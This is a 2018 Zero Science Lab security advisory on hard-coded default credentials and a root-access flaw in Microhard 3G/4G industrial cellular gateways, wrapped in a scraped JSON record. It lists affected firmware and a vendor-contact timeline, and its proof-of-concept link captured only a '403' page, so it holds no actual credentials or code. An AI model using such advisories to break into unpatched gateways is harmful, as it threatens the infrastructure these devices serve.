IPn3Gb provides a fast, secure industrial strength wireless solution that uses the widespread deployment of cellular network infrastructure for critical data collection. From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers! The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It provides robust and secure wireless communication of Serial, USB and Ethernet data. \n \nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things to the next level by providing features such as Ethernet with PoE, RS232 Serial port and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution worth looking at! \n \nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight system integration and design flexibility with dual Ethernet Ports and high power 802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access Control Lists, the Dragon-LTE provides a solution for any cellular application! \n \nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE network infrastructure for critical data communications. The VIP4Gb provides simultaneous network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network. It provides robust and secure wireless communication of Serial, Ethernet & WiFi data. \n\n##### Description\n\nThe devices utilizes hard-coded credentials within its Linux distribution image. These sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the gateway. Another vulnerability could allow an authenticated attacker to gain root access. The vulnerability is due to default credentials. An attacker could exploit this vulnerability by logging in using the default credentials. \n\n##### Vendor\n\nMicrohard Systems Inc. - <http://www.microhardcorp.com>\n\n##### Affected Version\n\nIPn4G 1.1.0 build 1098 \nIPn3Gb 2.2.0 build 2160 \nIPn4Gb 1.1.6 build 1184-14 \nIPn4Gb 1.1.0 Rev 2 build 1090-2 \nIPn4Gb 1.1.0 Rev 2 build 1086 \nBullet-3G 1.2.0 Rev A build 1032 \nVIP4Gb 1.1.6 build 1204 \nVIP4G 1.1.6 Rev 3.0 build 1184-14 \nVIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196 \nIPn3Gii / Bullet-3G 1.2.0 build 1076 \nIPn4Gii / Bullet-LTE 1.2.0 build 1078 \nBulletPlus 1.3.0 build 1036 \nDragon-LTE 1.1.0 build 1036 \n\n##### Tested On\n\nhttpd-ssl-1.0.0 \nLinux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3) \n\n##### Vendor Status\n\n[13.03.2018] Vulnerability discovered. \n[13.03.2018] Vendor contacted. \n[09.05.2018] No response from the vendor. \n[10.05.2018] Vendor contacted again. \n[24.05.2018] No response from the vendor. \n[25.05.2018] Vendor contacted again. \n[16.07.2018] No response from the vendor. \n[17.07.2018] Public security advisory released. \n\n##### PoC\n\n[microhard_default.txt](<../../codes/microhard_default.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://exchange.xforce.ibmcloud.com/vulnerabilities/146622> \n[2] <https://www.exploit-db.com/exploits/45040/> \n[3] <https://packetstormsecurity.com/files/148564> \n[4] <https://cxsecurity.com/issue/WLB-2018070166>\n\n##### Changelog\n\n[17.07.2018] - Initial release \n[23.07.2018] - Added reference [1], [2], [3] and [4] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "ZSL-2018-5480", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2018-5480.php", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Default Credentials", "type": "zeroscience", "sourceData": "<html><head><title>403 Nothing to see.</title>\n<link rel=\"Shortcut Icon\" href=\"favicon.ico\" type=\"image/x-icon\">\n<style type=\"text/css\">\n\n</style>\n</head>\n<body bgcolor=black>\n<center>\n<font color=\"#7E88A3\" size=\"2\">\n<br /><br />\n<h1>403 Nothing to see.</h1>\n\nYou do not have the powah for this request /403.shtml<br /><br />\n<font size=\"2\"><a href=\"https://www.zeroscience.mk\">https://www.zeroscience.mk</a></font>\n</font></center>\n</body></html>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/microhard_default.txt"}]}